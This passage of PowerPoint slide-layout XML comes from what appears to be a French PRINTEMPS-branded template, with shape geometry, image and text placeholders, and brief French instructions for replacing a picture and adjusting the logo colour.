              <a:gd name="connsiteY11" fmla="*/ 6855567 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 3307971 w 5090160"/>
              <a:gd name="connsiteY12" fmla="*/ 6855774 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 3307971 w 5090160"/>
              <a:gd name="connsiteY13" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 2003545 w 5090160"/>
              <a:gd name="connsiteY14" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 1738214 w 5090160"/>
              <a:gd name="connsiteY15" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 0 w 509016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90160" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5090160" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="3719195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="4747789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="4951799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="4951800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="4987731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090160" y="5030435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5089114" y="5030435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5087876" y="5080986"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5040848" y="6038694"/>
                  <a:pt x="4273447" y="6807041"/>
                  <a:pt x="3316135" y="6855567"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3307971" y="6855774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3307971" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2003545" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1738214" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685800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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Groupe 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E950D8B-30A6-4B2B-8C6C-32A8230ED68E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="2451438"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="2451438"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE5574B9-7FF2-43FB-9F45-EEF790FE928B}"/>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4" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4286649-FB79-4BB8-9BDA-8274CCEF87D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="511520" y="2946559"/>
              <a:ext cx="1885826" cy="2092881"/>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To change the </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="fr-FR" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Gilroy Bold" panose="00000800000000000000" pitchFamily="2" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>visual</a:t>
              </a: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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Supprimer le visuel</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Cliquez sur l'icône au centre du bloc gris</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Importer un visuel depuis votre ordinateur</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Sélectionnez le visuel</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Clic droit &gt; "arrière-plan"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="0" indent="-171450">
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Modifiez la couleur du logo PRINTEMPS (noir/blanc ou vert) en fonction de la luminosité de l'image sélectionnée </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F933F5C5-250E-4CC6-8075-DD98ECE46CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357500" y="1668111"/>
            <a:ext cx="6558875" cy="2215991"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF732074-D0EF-4870-8D8F-BAE379175E9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4700016" y="6457666"/>
            <a:ext cx="2623233"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BAE4CD4A-29C0-45EE-AFBF-DF78D6B3EE29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D290DFB8-7C94-40A9-95E7-C596AF2ED25E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558732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8" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AE7381E-4397-48DC-8607-7BDBCDEF4875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5587320"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4" name="Groupe 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38B496CC-C947-460D-9048-2DBABD05ABBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C454BB1A-F128-44F4-893E-E7CF79F3BEB4}"/>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2" name="Rectangle 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26194669-0DB5-4A8F-BCE8-5E89E907D5D7}"/>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33" name="Groupe 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B24CB762-A25D-4A2B-856B-1F40A44CFC76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="2596057"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="7045594" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="35" name="Groupe 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{548758A9-14B8-495C-8857-4A1D9DAF982F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7045594" y="2588002"/>
              <a:ext cx="1885826" cy="1681996"/>
              <a:chOff x="2689543" y="1651754"/>
              <a:chExt cx="1885826" cy="1681996"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F9BF04F-4AA0-4ADF-A345-B46C28A64EC8}"/>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3" name="Rectangle 42">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11562D90-F43E-48BC-B6E6-649AE90702D0}"/>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36" name="Image 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10C39BE8-C77B-4547-9CAA-BF2ABBFFE3F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1" name="Image 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D8C96C9-4DF8-45A9-83E7-2C3E28989D4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3598792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4 Pict + Title + Txt B">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Espace réservé pour une image  42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30938D38-C82D-464F-9BCD-29E35E838AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3071813" y="3251201"/>
            <a:ext cx="3225805" cy="2874632"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3225805"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2874632"/>
              <a:gd name="connsiteX1" fmla="*/ 474101 w 3225805"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2874632"/>
              <a:gd name="connsiteX2" fmla="*/ 474101 w 3225805"/>
              <a:gd name="connsiteY2" fmla="*/ 2 h 2874632"/>
              <a:gd name="connsiteX3" fmla="*/ 3225805 w 3225805"/>
              <a:gd name="connsiteY3" fmla="*/ 2 h 2874632"/>
              <a:gd name="connsiteX4" fmla="*/ 3225805 w 3225805"/>
              <a:gd name="connsiteY4" fmla="*/ 719946 h 2874632"/>
              <a:gd name="connsiteX5" fmla="*/ 1982723 w 3225805"/>
              <a:gd name="connsiteY5" fmla="*/ 2845216 h 2874632"/>
              <a:gd name="connsiteX6" fmla="*/ 1844398 w 3225805"/>
              <a:gd name="connsiteY6" fmla="*/ 2874632 h 2874632"/>
              <a:gd name="connsiteX7" fmla="*/ 158902 w 3225805"/>
              <a:gd name="connsiteY7" fmla="*/ 2874632 h 2874632"/>
              <a:gd name="connsiteX8" fmla="*/ 158902 w 3225805"/>
              <a:gd name="connsiteY8" fmla="*/ 2871812 h 2874632"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 3225805"/>
              <a:gd name="connsiteY9" fmla="*/ 2871812 h 2874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25805" h="2874632">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="474101" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474101" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3225805" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3225805" y="719946"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3225805" y="1768279"/>
                  <a:pt x="2692148" y="2642934"/>
                  <a:pt x="1982723" y="2845216"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1844398" y="2874632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158902" y="2874632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158902" y="2871812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2871812"/>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1" name="Espace réservé pour une image  40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{045BAB15-E73C-4526-8F86-955214FA5582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3251201"/>
            <a:ext cx="3020291" cy="2874632"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3020291"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2874632"/>
              <a:gd name="connsiteX1" fmla="*/ 3020291 w 3020291"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2874632"/>
              <a:gd name="connsiteX2" fmla="*/ 3020291 w 3020291"/>
              <a:gd name="connsiteY2" fmla="*/ 2874632 h 2874632"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 3020291"/>
              <a:gd name="connsiteY3" fmla="*/ 2874632 h 2874632"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3020291" h="2874632">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3020291" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3020291" y="2874632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2874632"/>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35" name="Espace réservé pour une image  34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B849FF5-901C-44B2-A3F2-E536FA094D0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3071813" y="1"/>
            <a:ext cx="3225805" cy="3176588"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3225805"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3176588"/>
              <a:gd name="connsiteX1" fmla="*/ 3225805 w 3225805"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 3176588"/>
              <a:gd name="connsiteX2" fmla="*/ 3225805 w 3225805"/>
              <a:gd name="connsiteY2" fmla="*/ 3176588 h 3176588"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 3225805"/>
              <a:gd name="connsiteY3" fmla="*/ 3176588 h 3176588"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3225805" h="3176588">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3225805" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3225805" y="3176588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3176588"/>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32" name="Espace réservé pour une image  31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27156404-7CA4-422A-A4E5-C890998BCC88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2" y="1"/>
            <a:ext cx="3020289" cy="3176588"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3020289"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3176588"/>
              <a:gd name="connsiteX1" fmla="*/ 3020289 w 3020289"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 3176588"/>
              <a:gd name="connsiteX2" fmla="*/ 3020289 w 3020289"/>
              <a:gd name="connsiteY2" fmla="*/ 3176588 h 3176588"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 3020289"/>
              <a:gd name="connsiteY3" fmla="*/ 3176588 h 3176588"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3020289" h="3176588">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3020289" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3020289" y="3176588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3176588"/>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34" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F933F5C5-250E-4CC6-8075-DD98ECE46CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6557485" y="1668111"/>
            <a:ext cx="5293156" cy="2215991"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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2" name="Espace réservé du numéro de diapositive 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAE4CD4A-29C0-45EE-AFBF-DF78D6B3EE29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D290DFB8-7C94-40A9-95E7-C596AF2ED25E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6787304"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8" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AE7381E-4397-48DC-8607-7BDBCDEF4875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6787305" y="1003988"/>
            <a:ext cx="5107686"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pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Image 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E8D0AE0-A672-49FF-ACDD-589216352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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Groupe 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{400EDD98-B226-49DC-B5FB-DA23BC64DEB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
